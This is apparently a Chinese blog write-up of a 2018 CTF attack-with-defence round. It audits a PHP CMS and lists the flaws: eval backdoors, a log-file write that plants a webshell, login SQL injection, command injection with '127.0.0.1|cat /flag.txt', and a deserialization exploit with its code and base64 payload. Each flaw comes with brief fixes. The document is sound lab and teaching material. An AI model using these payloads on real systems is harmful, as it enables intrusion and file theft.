2018领航杯awd简单复现
首先这里需要搭建一个cms的平台得到:
利用D盾进行漏洞扫描得到:
5级的eval后门漏洞
可以看到这里有一个5级的eval后门漏洞,我们查看文件得到源码:
这是一句话后门,我们利用一下这个后门得到:
这里能cat flag
修补增加过滤或者删除漏洞
2级的fwrite审计:
利用seay工具进行代码审计:
源码:
可以发现这是一个日志记录,但是它把记录的日志都写入到了
/var/www/html/log.php文件,这就造成文件写入漏洞
我们利用这个log1.php用get的方式写一个<?php phpinfo();?>
测试一下漏洞:
然后我们访问log.php文夹得到:
发现执行了phpinfo();
所以我们可以利用这个文件写入,去写入一句话木马
修复:
1、可以把log.php改成log.txt
2、增加危险字符过滤
2级漏洞eval(get_defined_vars()[’_GET’][‘cmd’]);
查看源码得到:
get_defined_vars()此函数返回一个包含所有已定义变量列表的多维数组,这些变量包括环境变量、服务器变量和用户定义的变量。
所有会获取所有的get方法,所有直接cmd执行命令:
修复:
1、进行危险字符过滤
2、把后门删除
在利用seay进行代码审计:
首先我们分析一下首页,index.php
:
发现包含了很多文件,这里有个/common/function.php文件
我们去访问这个文件得到:
可以看到这里把c作为一个对象,a作为一个方法进行调研
在index.php中可以看到,如果不给c传值会赋值为User
所有c的对象为User.php文件
所有看向User.php文件
我可以看到User这个类功还是挺多的,我们看向Login方法
sql注入
发现这里没有任何的过滤,所有登陆界面存在sql注入:
登陆得到:
修复:
进行危险字符过滤
命令执行
我在User.php看到:
看到这里有一个命令执行
我们在index.php哪里进行get请求
a=User&c=ping
然后在进行host请求:
发现执行了命令
利用命令:
127.0.0.1|cat /flag.txt
修复漏洞;
进行危险字符过滤
反序列化
在seay中全局查询反序列化函数得到:
反序列化漏洞源码:
payload:
class home{private $method;private $args;
}$a = new home("ping",array('127.0.0.1|cat /flag.txt'));$b = serialize($a);echo base64_encode($b);
得到:
Tzo0OiJob21lIjoyOntzOjEyOiIAaG9tZQBtZXRob2QiO3M6NDoicGluZyI7czoxMDoiAGhvbWUAYXJncyI7YToxOntpOjA7czoyNDoiMTI3LjAuMC4xfGNhdCAJL2ZsYWcudHh0Ijt9fQ==
得到flag。
漏洞修补:
过滤危险字符
本人比较菜漏洞审计就到这里,不妥的地方大佬勿喷
其它漏洞我也审计不出来直接上waf通防范。
2018领航杯awd简单复现相关推荐
- 2018蓝桥杯校选复现7
题目 众所周知,ccm不仅擅长数据结构,还擅长带妹吃鸡.某日,ccm与yblin四排带妹,yblin提出了十分优秀的战略部署:平原跳伞.分散打钱.于是,,,他们队伍里就只剩ccm了.为了带妹纸躺赢,c ...
- awd的批量脚本 pwn_北极星杯 awd复现
北极星杯 awd复现 服务器共有3个web和一个pwn web1 1,down下web1的源码,使用D盾扫描: 2,漏洞1:发现三个冰蝎的木马,和一个一句话木马 冰蝎的后门需要使用冰蝎的客户端进行连接 ...
- 阿里云天池 - 2018之江杯全球人工智能大赛 之零样本图像目标识别 参赛总结
9月份报名做了 2018之江杯全球人工智能大赛 之零样本图像目标识别 的这道题 - 题目链接-https://tianchi.aliyun.com/competition/entrance/2 ...
- #2019江苏领航杯部分wp
关于2019领航杯部分wp 队友的wp 两天前参加了领航杯,奋斗了24小时,做出了十几题. 第一题签到题 base64解码 第三题steganoI 一个简单的隐写,可以用strings查看他的信息 第 ...
- 高薪寻人 | 2018 “神策杯”高校算法大师赛 6 强诞生,【招人】进行时……
近日,2018 "神策杯"高校算法大师赛在北京落下帷幕. 此次比赛共提交近 3000 份优秀作品,近 600 支队伍激情参与,神策数据专家团队通过作品评估.成果展示.现场路演等层层 ...
- 2018 “神策杯”高校算法大师赛 6 强诞生,【招人】进行时……
近日,2018 "神策杯"高校算法大师赛在北京落下帷幕. 此次比赛共提交近 3000 份优秀作品,近 600 支队伍激情参与,神策数据专家团队通过作品评估.成果展示.现场路演等层层 ...
- nginx解析漏洞简单复现及修复
Nginx简介 Nginx是一款轻量级的web服务器/反向代理服务器及电子邮件(IMAP/POP3)代理服务器,其特点是占内存小.并发能力强:国内使用Nginx的有百度.京东.新浪.网易.腾讯.淘宝等 ...
- 大赛报名 | 2023“领航杯”国际创新创业大赛项目征集启动
全国创业大赛热点资讯 2023"领航杯"国际创新创业大赛 3月31日下午,2023"领航杯"国际创新创业大赛启动,面向"半导体.生命健康.新能源新材料 ...
- 蓝桥杯ACM简单题-生日蜡烛 2020-12-22
蓝桥杯ACM简单题-生日蜡烛 1.问题描述 某人从某年开始每年都举办一次生日派对,并且每次都要吹熄与年龄相同根数的蜡烛.现在算起来,他一共吹熄了236根蜡烛.请问,他从多少岁开始过生日派对的? 2.算 ...
最新文章
- Zeal编程查询,离线文档浏览器
- 简单探索MNIST(Softmax回归和两层CNN)-Tensorflow学习
- unity导入素材时材质丢失素材变成粉红色的解决方法
- 《深入体验Java Web开发内幕——核心基础》目录
- Visual Studio 解决方案版本从v12-->v14
- 类 kotlin(13)
- 【pandas】column变index,dataframe转置
- 车辆动力学模型在仿真测试中的应用实践
- Ant Design Vue下载本地文件(其他框架也适用)
- itext设置字体间距_Java使用iText生成pdf
- 天龙八部排名(三联版)
- 4418linux内核源码,4418开发板Uboot内核文件系统编译脚本分析
- 视打击微软 力挺国产红旗Linux
- 哈希(哈希表的应用)
- How to Install Nvidia Kernel Module Cuda and Pyrit in Kali Linux
- 简单介绍java中的强制类型转换
- 什么是FD.IO/VPP?
- linux权限sudo和su,Linux中su与sudo、su - root的区别
- 是的,奈学教育一周年了!
- Linux下的视频采集(V4L2)
热门文章
- ysoserial CC5利用链分析
- From.Designer.cs和From.cs的关系
- JAXWS CXF WSDL first + MyEclipse + Maven Byron自學視頻03
- MySQL数据操作语言——插入语句、修改语句和删除语句
- 设置Asterisk座席实时监控
- Web版2048游戏制作
- win7设置定时锁定计算机,Windows7电脑屏幕如何设置不自动锁屏
- GPA计算(5.0分制)
- ICC2: secondary pg pin的作用与连接
- 【android】简易的登陆界面的xml设计——代码复用,节省时间